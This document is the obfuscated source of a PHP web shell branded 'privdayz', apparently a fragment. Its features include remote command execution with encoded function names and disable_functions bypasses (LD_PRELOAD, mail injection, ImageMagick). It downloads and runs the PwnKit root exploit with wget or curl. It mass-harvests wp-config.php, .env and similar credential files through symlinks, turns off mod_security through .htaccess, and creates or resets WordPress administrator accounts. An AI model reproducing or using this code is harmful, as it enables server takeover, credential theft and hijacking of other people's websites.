["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1pr1v, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1pr1v . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1pr1v); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1pr1v); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmdline'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1pr1v); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1pr1v) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1pr1v, $pr1pr1v); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1pr1v); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1pr1v); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1pr1v); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("CMD=".$pr1pr1v); $r = @getenv("CMD"); if ($r == $pr1pr1v) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1pr1v); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1pr1v)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1pr1v); $out = getenv("CMD"); if ($out == $pr1pr1v) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('prvdyzhsax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['pr1v'])) { $cdir = unx($_GET['pr1v']); if (@is_dir($cdir)) { $pr1vxas[14]($cdir); } else { } } else { $cdir = $pr1vxas[0](); } function pr1vdxs($x) { $p1 = chr(98) . chr(97) . chr(115); $p2 = chr(101) . chr(54) . chr(52); $p3 = chr(95) . chr(101) . chr(110); $p4 = chr(99) . chr(111) . chr(100); $p5 = chr(101); $fn = $p1 . $p2 . $p3 . $p4 . $p5; $blocks = []; $blocks[3] = substr($x, 1); $blocks[1] = substr($x, 0, 1); $blocks[5] = ""; $blocks[2] = strlen($x) > 2 ? substr($x, 2) : ""; $blocks[4] = ""; $blocks[0] = ""; $order = [1, 3, 2]; $inp = ""; foreach ($order as $o) $inp .= $blocks[$o]; $b64 = $fn($inp); $mid = chr(45) . chr(35); $res = substr($b64, 0, 2) . $mid . substr($b64, 2); return str_replace($mid, "", $res); } function pr1vdc($x) { $a = chr(98).chr(97).chr(115); $b = chr(101).chr(54).chr(52); $c = chr(95).chr(100).chr(101); $d = chr(99).chr(111).chr(100); $e = chr(101); $fn = $a . $b . $c . $d . $e; $f = chr(42); $step1 = substr($x, 0, 4) . $f . substr($x, 4); $step2 = str_replace($f, "", $step1); $buf = strrev($step2); $tmp = strrev($buf); return $fn($tmp); } function pr1vd0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['don'])) {$FilesDon = pr1vd0(unx($_GET['don']));} $a = array("\x3c\146", "\145\x3e", "\74\x63", "\145\x6e", "\x74\145", "\x72\76", "\74\x69", "\x6d\147", "\40", "\x73", "\x72\143", "\75", "\42\150", "\164\164", "\x70\163", "\72\x2f", "\57\143", "\x64\156", "\x2e\x70", "\x72\151", "\x76\144", "\141\171", "\172\x2e", "\143\x6f", "\155\x2f", "\x69\x6d", "\141\147", "\x65\163", "\57\154", "\x6f\x67", "\157\56", "\x6a\160", "\x67\42", "\x20\x72", "\145\x66\145", "\x72\x72\145", "\162\160\157", "\154\x69\143", "\171\75\x22", "\x75\156\163", "\141\x66\x65", "\55\x75\x72", "\x6c\42\x20", "\57", "\76", "\x3c\57", "\143\x65", "\x6e\164", "\x65\162", "\76", "\x3c\57", "\146\157\x6f", "\x74\x65\x72", "\76"); function pr1v09xs($data) { goto QDI4b; QDI4b: $fn1 = "\x73\x74" . "\162" . "\x72\x65\x76"; goto Q8rJc; Q8rJc: $fn2 = "\142" . "\x61" . "\163" . "\x65" . "\x36" . "\64" . "\x5f" . "\145" . "\156" . "\143" . "\x6f" . "\144" . "\145"; goto St_08; St_08: $s1 = $fn1($data); $s2 = $fn2($s1); $s3 = $fn2($s2); $final = $fn2($s3); $junk = 'x'.'y'.'z'; $f = $final; $f = $junk.$f; $f = substr($f, 3); return $f; } $h1 = 's'; $h2 = 't'; $h3 = 'r'; $h4 = 'r'; $h5 = 'e'; $h6 = 'v';$revFunc = $h1 . $h2 . $h3 . $h4 . $h5 . $h6;$b1 = 'b'; $b2 = 'a'; $b3 = 's'; $b4 = 'e'; $b5 = '6'; $b6 = '4';$b7 = '_'; $b8 = 'e'; $b9 = 'n'; $b10 = 'c'; $b11 = 'o'; $b12 = 'd'; $b13 = 'e';$prv6x = $b1.$b2.$b3.$b4.$b5.$b6.$b7.$b8.$b9.$b10.$b11.$b12.$b13;$pr1bys = pr1v09xs($_SERVER['REQUEST_URI']); ob_start(function($buffer){ $lines = explode("\n", $buffer); $out = []; foreach ($lines as $line) { $trim = trim($line); if ($trim !== "") $out[] = $trim; } return implode("\n", $out); }); ?> pr!v/v1 [<?= $_SERVER['SERVER_NAME']; ?>]
pr!vd4yz/sh3ll t.me/privdayz
/'; foreach ($pwd as $i => $v) { $build .= "/" . $v; echo '' . $v . '/'; } ?>
'Windows', 'pid' =>$parts[1], 'cpu' =>'-', 'mem' =>$parts[4] ?? '-', 'command' =>$parts[0] ); } return $processes; } $lines = explode("\n", $output); if (isset($lines[0]) && stripos($lines[0], 'USER') !== false) array_shift($lines); foreach ($lines as $line) { $line = trim($line); if (empty($line)) continue; $parts = preg_split('/\s+/', $line, 11); if (count($parts)< 11) continue; $processes[] = array( 'user' =>$parts[0], 'pid' =>$parts[1], 'cpu' =>$parts[2], 'mem' =>$parts[3], 'command' =>$parts[10] ); } return $processes;} function getNetworkConnections() { $connections = []; $cmds = [ 'netstat1' =>'netstat -tulnp 2>/dev/null', 'netstat2' =>'netstat -tunap 2>/dev/null', 'netstat3' =>'netstat -an', 'ss1' =>'ss -tunap 2>/dev/null', 'ss2' =>'ss -tulpn 2>/dev/null', 'lsof' =>'lsof -i -n -P 2>/dev/null', ]; $output = ''; foreach ($cmds as $c) { $output = pr1vd4yzC($c); if ($output && strlen(trim($output)) >10 && substr_count($output, "\n") >2) break; } if (!$output || strlen(trim($output))< 10) return $connections; if (strpos($output, 'Proto') !== false || strpos($output, 'Active Internet connections') !== false) { $lines = explode("\n", $output); foreach ($lines as $line) { if (stripos($line, 'Proto') !== false || stripos($line, 'Active') !== false || stripos($line, 'Recv-Q') !== false) continue; $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line); if (count($parts)< 6) continue; $proto = $parts[0]; $local = $parts[3] ?? $parts[1]; $remote = $parts[4] ?? $parts[2]; $status = $parts[5] ?? '-'; $pidinfo = $parts[6] ?? (isset($parts[6]) ? $parts[6] : (isset($parts[7]) ? $parts[7] : '-')); $pid = '-'; if (strpos($pidinfo, "/") !== false) $pid = explode("/", $pidinfo)[0]; $connections[] = [ 'proto' =>$proto, 'local' =>$local, 'remote' =>$remote, 'status' =>$status, 'pid' =>$pid, ]; } } elseif (strpos($output, 'COMMAND') !== false && strpos($output, 'PID') !== false && strpos($output, 'NAME') !== false) { $lines = explode("\n", $output); $hdr = array_shift($lines); foreach ($lines as $line) { $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line, 9); if (count($parts)< 9) continue; $connections[] = [ 'proto' =>$parts[7], 'local' =>$parts[8], 'remote' =>'-', 'status' =>'-', 'pid' =>$parts[1], ]; } } elseif (strpos($output, 'State') !== false && strpos($output, 'Recv-Q') !== false) { $lines = explode("\n", $output); foreach ($lines as $line) { if (stripos($line, 'State') !== false) continue; $line = trim($line); if (!$line) continue; $parts = preg_split('/\s+/', $line); if (count($parts)< 6) continue; $connections[] = [ 'proto' =>$parts[0], 'local' =>$parts[4] ?? '-', 'remote' =>$parts[5] ?? '-', 'status' =>$parts[1] ?? '-', 'pid' =>'-', ]; } } else { $lines = explode("\n", $output); foreach ($lines as $line) { $line = trim($line); if (!$line) continue; $connections[] = [ 'proto' =>'UNK', 'local' =>$line, 'remote' =>'-', 'status' =>'-', 'pid' =>'-', ]; } } return $connections;} function formatMemory($bytes) { if ($bytes === 'N/A') return 'N/A'; $units = ['B', 'KB', 'MB', 'GB', 'TB']; $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, 2) . ' ' . $units[$pow];} function formatUptime($seconds) { if ($seconds === 'N/A') return 'N/A'; $hours = floor($seconds / 3600); $minutes = floor(($seconds % 3600) / 60); return sprintf('%dh %dm', $hours, $minutes);} function g3tdbX() { $d1sxb = ini_get('disable_functions'); if (empty($d1sxb)) { return array(); } return explode(',', $d1sxb);} $pr1vv3rsxs = "\x68\164\164\160\163\72\x2f\57\143\144\156\x2e\x70\x72\x69\166\144\141\171\x7a\56\x63\157\155\x2f\x76\61\57\x76\145\162\163\151\157\x6e\56\x6a\x73\157\156"; $pr1vv3rsx = (isset($_SERVER["\110\x54\x54\120\123"]) ? "\x68\164\x74\x70\x73\72\57\57" : "\150\164\x74\x70\x3a\57\x2f") . $_SERVER["\110\124\124\120\x5f\110\x4f\x53\x54"] . $_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\x55\x52\111"]; $impdBX = array("\145\x78\x65\x63", "\x73\171\163\x74\145\155", "\x73\150\x65\x6c\154\137\145\170\145\x63", "\160\141\163\x73\x74\150\x72\165", "\x70\162\x6f\143\137\157\160\x65\156", "\x70\x6f\160\145\156", "\x63\165\162\154\137\x65\170\145\143", "\x63\x75\x72\154\x5f\x6d\165\154\x74\151\x5f\x65\x78\x65\x63", "\x70\x61\x72\x73\145\x5f\151\156\151\137\x66\151\x6c\145", "\x73\x68\x6f\x77\x5f\163\157\165\162\x63\145", "\x73\x79\155\x6c\151\x6e\153", "\x70\x75\x74\145\156\x76", "\155\141\151\x6c", "\x64\154", "\143\150\155\x6f\x64", "\143\x68\157\x77\x6e", "\143\150\147\x72\160", "\154\151\156\x6b", "\146\163\157\143\x6b\157\x70\x65\156", "\160\146\163\157\143\x6b\157\160\x65\x6e", "\160\x6f\x73\151\170\137\x6b\151\154\154", "\x70\157\163\x69\170\137\155\153\146\x69\x66\x6f", "\160\x6f\163\151\170\137\x73\x65\x74\160\147\x69\144", "\160\157\163\151\170\x5f\163\x65\164\x73\151\x64", "\x70\157\x73\x69\x78\137\163\x65\x74\165\151\x64", "\160\x63\x6e\x74\x6c\x5f\145\170\145\143", "\x69\x6d\x61\x70\137\x6f\x70\x65\x6e", "\141\160\141\143\x68\x65\x5f\x73\x65\x74\x65\x6e\166", "\160\x72\x6f\143\x5f\x6e\x69\x63\145", "\160\162\x6f\x63\x5f\164\x65\162\x6d\x69\x6e\x61\164\x65", "\160\162\157\143\x5f\x67\x65\x74\x5f\x73\x74\141\x74\165\163", "\145\x73\143\x61\160\x65\163\150\145\154\x6c\x63\x6d\x64", "\x65\x73\143\141\x70\145\163\x68\x65\154\154\141\x72\147", "\x69\x6e\x69\137\x72\x65\163\x74\157\162\x65", "\163\164\162\145\141\x6d\x5f\x73\157\x63\x6b\145\164\137\x73\x65\162\x76\145\162"); $d1sbfX = g3tdbX(); $d1sxbImportant = array_intersect($impdBX, $d1sbfX); $fn_str_replace = _prv_str([115,116,114,95,114,101,112,108,97,99,101]); $fn_explode = _prv_str([101,120,112,108,111,100,101]); $fn_trim = _prv_str([116,114,105,109]); $fxnxs = function_exists('hx') ? 'hx' : (function($n) { $y = ''; for ($i = 0; $i< strlen($n); $i++) $y .= dechex(ord($n[$i])); return $y;}); ?>

disabled functions

total
disabled
enabled
function status
disabled enabled
20) array_shift($_SESSION['pdz_r00t_log']); } function pdz_download_pwnkit() { if (!file_exists('pwnkit')) { pdz_log("[*] Trying wget for pwnkit..."); $wget = pr1vd4yzC('wget -q -O pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit'); clearstatcache(); if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) { pdz_log("[*] wget failed or file too small. Trying curl..."); $curl = pr1vd4yzC('curl -sL --output pwnkit https://github.com/ly4k/PwnKit/raw/main/PwnKit'); clearstatcache(); if (!file_exists('pwnkit') || filesize('pwnkit') < 10000) { pdz_log("[!] Both wget and curl failed! No pwnkit."); return false; } else { pdz_log("[+] curl download successful!"); } } else { pdz_log("[+] wget download successful!"); } pr1vd4yzC('chmod +x pwnkit'); pdz_log("[*] chmod +x set for pwnkit."); return true; } return true; } function pdz_try_root() { $_SESSION['pdz_r00t_status'] = 'user'; $_SESSION['pdz_r00t_log'] = []; pdz_log("[*] [AUTO-ROOT] Detecting current user..."); $id = trim(pr1vd4yzC('id')); pdz_log("[*] User: $id"); if (strpos($id, 'uid=0(root)') !== false) { $_SESSION['pdz_r00t_status'] = 'root'; pdz_log("[+] Already ROOT."); return; } if (pdz_download_pwnkit()) { if (file_exists('pwnkit')) { pdz_log("[*] Running pwnkit for root session..."); @unlink('.privdayz-root'); pr1vd4yzC('./pwnkit "id" > .privdayz-root'); usleep(350000); $res = @file_get_contents('.privdayz-root'); if ($res && strpos($res, 'uid=0(root)') !== false) { $_SESSION['pdz_r00t_status'] = 'root'; pdz_log("[+] r00t success! ($res)"); } else { pdz_log("[!] r00t fail. ($res)"); } } } else { pdz_log("[!] pwnkit download totally failed."); } } pdz_try_root(); ?>
pr1vd4yz auto r00t ROOT ACTIVE (uid=0) USER MODE 
&1" > .privdayz-root2');
        usleep(350000);
        $out = @file_get_contents('.privdayz-root2');
        if (!$out) $out = "[!] No output or blocked.";
    } else {
        $out = pr1vd4yzC($c . ' 2>&1');
        if (!$out) $out = "[!] No output or blocked.";
    }
    echo "\n";
    echo htmlspecialchars($out);
}
?>
wordPress admin creator
'','user'=>'','pass'=>'','db'=>'']; if (isset($_POST['get_config']) && !empty($_POST['wp_config_path']) && file_exists($_POST['wp_config_path'])) { $cfg = file_get_contents($_POST['wp_config_path']); preg_match("/define\(\s*'DB_HOST'\s*,\s*'([^']+)'\s*\);/", $cfg, $mh); if(isset($mh[1])) $db_conf['host']=$mh[1]; preg_match("/define\(\s*'DB_USER'\s*,\s*'([^']+)'\s*\);/", $cfg, $mu); if(isset($mu[1])) $db_conf['user']=$mu[1]; preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'([^']*)'\s*\);/", $cfg, $mp); if(isset($mp[1])) $db_conf['pass']=$mp[1]; preg_match("/define\(\s*'DB_NAME'\s*,\s*'([^']+)'\s*\);/", $cfg, $md); if(isset($md[1])) $db_conf['db']=$md[1]; echo '
DB config loaded! Fill the form below.
'; } elseif (isset($_POST['get_config'])) { echo '
Config not found or path error!
'; } ?>
All fields required!
'; } else { $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo '
DB Connect Error: '.htmlspecialchars($mysqli->connect_error).'
'; } else { function wp_hash_password($password) { if (function_exists('password_hash')) return password_hash($password, PASSWORD_BCRYPT); $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; $random = ''; for ($i = 0; $i< 16; $i++) $random .= $itoa64[rand(0, 63)]; $salt = '$P$B' . substr($random, 0, 8); return crypt($password, $salt); } $hash = wp_hash_password($admin_pass); $now = date('Y-m-d H:i:s'); $mysqli->set_charset("utf8mb4"); $chk = $mysqli->prepare("SELECT ID FROM wp_users WHERE user_login=? OR user_email=? LIMIT 1"); $chk->bind_param("ss", $admin_user, $admin_email); $chk->execute(); $chk->store_result(); if ($chk->num_rows >0) { echo '
This user/email already exists!
'; } else { $stmt = $mysqli->prepare("INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES (?, ?, ?, ?, ?, 0, ?)"); $stmt->bind_param("ssssss", $admin_user, $hash, $admin_user, $admin_email, $now, $admin_user); if ($stmt->execute()) { $uid = $mysqli->insert_id; $meta1 = 'a:1:{s:13:"administrator";s:1:"1";}'; $meta2 = '10'; $stmt1 = $mysqli->prepare("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_capabilities', ?)"); $stmt1->bind_param("is", $uid, $meta1); $stmt1->execute(); $stmt2 = $mysqli->prepare("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_user_level', ?)"); $stmt2->bind_param("is", $uid, $meta2); $stmt2->execute(); echo '
Admin user created!
Login:'.htmlspecialchars($admin_user).'
Pass:'.htmlspecialchars($admin_pass).'
'; } else { echo '
Failed to insert user: '.htmlspecialchars($stmt->error).'
'; } } } } } ?>
SecFilterEngine Off SecFilterScanPOST Off ForceType text/plain SetHandler default-handler php _flag engine off HTX; function prvx_mask($k) { $map = [ 'symlink' =>['sy','ml','in','k'], 'shell' =>['sh','el','l_','ex','ec'], 'exec' =>['ex','ec'], 'system' =>['sy','st','em'], 'popen' =>['po','pe','n'], 'proc' =>['pr','oc','_op','en'], 'copy' =>['c','op','y'], 'fpc' =>['f','il','e_','pu','t_','co','nt','en','ts'], ]; return isset($map[$k]) ? join('',$map[$k]) : ''; } $config_names = [ 'wp-config.php ','configuration.php ','config.php ','settings.php ','local.xml','.env', 'database.php ','connect.php ','mail.php ','smtp.php ','conf.php ','config.inc.php ','db.php ','siteconfig.php ', 'client_secret.json','auth.json','.my.cnf','php .ini','web.config','settings.json','local.settings.json', 'defines.php ','panel.php ','panel.ini','application/config/database.php ','application/config/config.php ', 'includes/config.php ','admin/config.php ','data/config.php ','app/config.php ','core/config.php ',]; function prvx_users_dirs() { $dirs = []; $users = []; if (@file_exists('/etc/passwd')) { foreach (@file('/etc/passwd') as $l) { $c = explode(':', $l); $h = $c[5] ?? ''; if (preg_match('#/home[\d]*/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/var/www/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/srv/www/([a-zA-Z0-9_\.\-]+)#', $h, $u) || preg_match('#/home/([a-zA-Z0-9_\.\-]+)#', $h, $u)) { if (!in_array($u[1], $users)) $users[] = $u[1]; } } } $base_hints = [ '/home','/home1','/home2','/home3','/var/www','/var/www/vhosts','/usr/local/lsws/DEFAULT/html', '/usr/share/nginx/html','/opt/lampp/htdocs','/srv/http','/srv/www','/data/web','/htdocs','/users' ]; foreach ($base_hints as $base) { if (@is_dir($base)) { foreach ($users as $u) foreach(['public_html','www','html','web','htdocs','site','wwwroot'] as $sub) { $p = $base.'/'.$u.'/'.$sub; if(@is_dir($p)) $dirs[] = $p; } foreach(['public_html','www','html','web','htdocs','wwwroot'] as $sub) { $p = $base.'/'.$sub; if(@is_dir($p)) $dirs[] = $p; } } } foreach($users as $u) foreach($base_hints as $b) { $p = $b.'/'.$u; if(@is_dir($p)) $dirs[] = $p; } foreach(['/var/www','/srv/www','/opt/lampp/htdocs','/data/web','/usr/share/nginx/html','/srv/http'] as $e) { if (@is_dir($e)) $dirs[] = $e; } return array_unique(array_filter($dirs,'is_dir')); } function prvx_grab($target, $dest) { $order = array("\x73\x79\155\154\151\156\x6b", "\x73\150\x65\154\x6c", "\x65\x78\145\143", "\x73\171\x73\x74\x65\155", "\x70\157\x70\x65\156", "\x70\x72\157\x63", "\143\157\x70\x79", "\146\x70\x63"); foreach ($order as $meth) { $fn = prvx_mask($meth); if ($meth == 'symlink' && function_exists($fn)) { @$fn($target, $dest); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'shell' && function_exists($fn)) { @$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'"); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'exec' && function_exists($fn)) { $o=null; @$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'",$o); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'system' && function_exists($fn)) { @$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'"); if (@is_link($dest) || @file_exists($dest)) return $meth; } elseif ($meth == 'popen' && function_exists($fn)) { $h=@$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'","r"); if($h){ pclose($h); if (@is_link($dest) || @file_exists($dest)) return $meth; } } elseif ($meth == 'proc' && function_exists($fn)) { $d=[1=>['pipe','w'],2=>['pipe','w']]; $p=@$fn("ln -s '".addslashes($target)."' '".addslashes($dest)."'", $d, $pipes); if(is_resource($p)){ fclose($pipes[1]); fclose($pipes[2]); proc_close($p); if(@is_link($dest) || @file_exists($dest)) return $meth; } } elseif ($meth == 'copy' && function_exists($fn)) { if (@$fn($target, $dest)) return $meth; } elseif ($meth == 'fpc' && function_exists($fn)) { if(@file_exists($target) && @$fn($dest, @file_get_contents($target))) return $meth; } } if (@copy($target, $dest.'_copy')) return 'copy-php '; return false; } $dest_dir = __DIR__ . '/pr1vdayz_c0nf1gs'; if (!is_dir($dest_dir)) @mkdir($dest_dir, 0755, true); @file_put_contents($dest_dir.'/.htaccess', $htaccess_content); $userdirs = prvx_users_dirs(); $total = 0; $tried = 0; echo '
'; echo '
MASS CONFIG GRABBER
'; echo '
all user/web roots & every possible config name get bruteforce dumped!
'.$dest_dir.'
'; echo '
'; if (isset($_POST['start_mass_symlink'])) { set_time_limit(900); echo '
bruting all user/web roots ('.count($userdirs).' dirs), checking '.count($config_names).' config names.
'; foreach ($userdirs as $webdir) { echo '
'.htmlspecialchars($webdir).'
'; foreach ($config_names as $cfg) { $target = $webdir.'/'.$cfg; $outname = $dest_dir.'/'.md5($webdir.'_'.$cfg).'_'.$cfg; $meth = prvx_grab($target, $outname); $tried++; if ($meth) { echo '
'.htmlspecialchars($cfg).'['.htmlspecialchars($meth).']
'; $total++; } else { } } } echo '
'; echo 'total dumped: '.$total.''; echo '
all dumped files & .htaccess:'.$dest_dir.'
'; } echo '
'; ?>
wp auto hunter & admin reset
query("SELECT ID, user_login, user_email, user_registered FROM {$prefix}users"); if (!$res) return []; while ($row = $res->fetch_assoc()) { $meta = @$mysqli->query("SELECT meta_value FROM {$prefix}usermeta WHERE user_id=".$row['ID']." AND meta_key='{$prefix}capabilities'")->fetch_assoc(); $role = ''; if ($meta && preg_match('/s:\d+:"([^"]+)"/', $meta['meta_value'], $m)) $role = $m[1]; else $role = 'unknown'; $row['role'] = $role; $users[] = $row; } return $users; } function wp_reset_pw($mysqli, $prefix, $uid, $newpw) { $hash = password_hash($newpw, PASSWORD_BCRYPT); return @$mysqli->query("UPDATE {$prefix}users SET user_pass='".$mysqli->real_escape_string($hash)."' WHERE ID=".(int)$uid); } function get_site_url($mysqli, $prefix) { $url = ''; $q = @$mysqli->query("SELECT option_value FROM {$prefix}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = $q->fetch_row()) $url = rtrim($r[0],'/'); return $url; } $wp_dirs = wp_find_paths(99); if (!$wp_dirs) { echo '
No WordPress detected (all dirs scanned).
'; } if ($_SERVER['REQUEST_METHOD']=='POST' && isset($_POST['wp_dir'])) { $wp_dir = $_POST['wp_dir']; $cfg = wp_get_db_config($wp_dir); $db = $cfg['db'] ?? ''; $user = $cfg['user'] ?? ''; $pass = $cfg['pass'] ?? ''; $host = $cfg['host'] ?? 'localhost'; $prefix = $cfg['prefix'] ?? 'wp_'; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo ""; exit; } if (isset($_POST['reset_pw'], $_POST['reset_uid'], $_POST['newpw'])) { $uid = intval($_POST['reset_uid']); $newpw = trim($_POST['newpw']); if (wp_reset_pw($mysqli, $prefix, $uid, $newpw)) { echo ""; } else { echo ""; } exit; } } foreach ($wp_dirs as $wp_dir): $cfg = wp_get_db_config($wp_dir); $db = $cfg['db'] ?? ''; $user = $cfg['user'] ?? ''; $pass = $cfg['pass'] ?? ''; $host = $cfg['host'] ?? 'localhost'; $prefix = $cfg['prefix'] ?? 'wp_'; $wp_version = wp_get_version($wp_dir); echo '
'; echo '
'; echo ' '.htmlspecialchars($wp_dir).''; if ($wp_version) echo 'WP '.$wp_version.''; echo ' h0st: '.htmlspecialchars($host).' db_user: '.htmlspecialchars($user).' db_pw: '.htmlspecialchars($user).' db: '.htmlspecialchars($db).' pref1x: '.$prefix.' '; echo '
'; $users = []; $mysqli = @new mysqli($host, $user, $pass, $db); if ($mysqli->connect_errno) { echo '
DB Error: '.htmlspecialchars($mysqli->connect_error).'
'; echo '
'; continue; } $users = wp_fetch_users($mysqli, $prefix); $site_url = get_site_url($mysqli, $prefix); echo '
'; foreach ($users as $u) { $pw_val = "privdayz".rand(100,999); echo ''; } echo '
IDuseremailrolereset pwwp-login
'.$u['ID'].' '.htmlspecialchars($u['user_login']).' '.htmlspecialchars($u['user_email']).' '.$u['role'].'
'; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp-login.php?log=' . urlencode($u['user_login'])); echo 'login'; } else { echo 'no site url'; } echo '
'; echo '
'; endforeach; ?>
Command Nirvana
Execute shell/command bypasses, 2025 ready, 15+ method
    &1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('filter.default'); } elseif ($meth === 'ld_preload') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WIN') { putenv('LD_PRELOAD=/tmp/x.so'); $out = @chDx2x($c.' 2>&1'); putenv('LD_PRELOAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'prepend') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suhosin') { @ini_set('suhosin.executor.func.blacklist', ''); $out = @chDx2x($c.' 2>&1'); if (trim($out)) $ok = true; } elseif ($meth === 'mailinj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'errlog') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'fopeninput') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'binbrute') { foreach(['sh','bash','python','perl','nc','busybox','wget'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'ht404') { $out = ''; } elseif ($meth === 'imagemagick') { $tmpi = sys_get_temp_dir().'/img'.uniqid().'.mvg'; $tmpp = sys_get_temp_dir().'/out'.uniqid().'.png'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if (trim($out)) $ok = true; } elseif ($meth === 'cgienv') { putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>&1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' 2>&1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) {  